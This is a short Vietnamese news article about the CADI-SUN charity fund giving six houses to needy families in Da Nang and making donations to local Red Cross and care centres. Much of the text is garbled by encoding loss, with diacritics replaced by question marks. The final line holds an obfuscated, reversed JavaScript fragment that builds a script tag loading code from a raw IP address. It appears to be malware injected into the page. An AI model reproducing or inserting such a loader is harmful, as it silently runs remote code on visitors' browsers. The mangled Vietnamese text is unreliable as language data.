CADI-SUN trao nhà Nhân Ái tại Đà Nẵng


ND?T – Ngày 31-7, t?i TP ?à N?ng, Qu? t? thi?n CADI-SUN Hành Trình Nhân Ái ?ã t? ch?c bu?i l? trao t?ng nhà cho các h? gia ?ình có hoàn c?nh khó kh?n t?i ?à N?ng.
Ch??ng trình ?ã trao t?ng sáu ngôi nhà cho các gia ?ình. ?ây là nh?ng gia ?ình có hoàn c?nh th?t s? khó kh?n, ?ang s?ng trong nh?ng ngôi nhà xu?ng c?p và không có kh? n?ng xây s?a, c?i thi?n l?i.Ngoài ra, Qu? còn trao t?ng H?i Ch? th?p ?? TP ?à N?ng 50 tri?u ??ng nh?m ?ng h? qu? nhân ??o c?a thành ph?. Hành Trình Nhân Ái c?ng ?ã ??n Trung tâm ph?ng d??ng ng??i có công cách m?ng TP. ?à N?ng và Trung tâm nuôi d??ng tr? m? côi H?i ch? th?p ?? TP. ?à N?ng ?? trao t?ng nh?ng ph?n quà tr? giá 30 tri?u ??ng.

?à N?ng là ??a ph??ng ??u tiên ???c trao nhà trong s? n?m t?nh, thành mà chuy?n xe CADI-SUN Hành Trình Nhân Ái ?i qua g?m: ?à N?ng, Qu?ng Nam, Quãng Ngãi, Bình ??nh, Phú Yên. T?ng c?ng s? có 26 ngôi nhà ???c trao trong hành trình l?n này. uqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))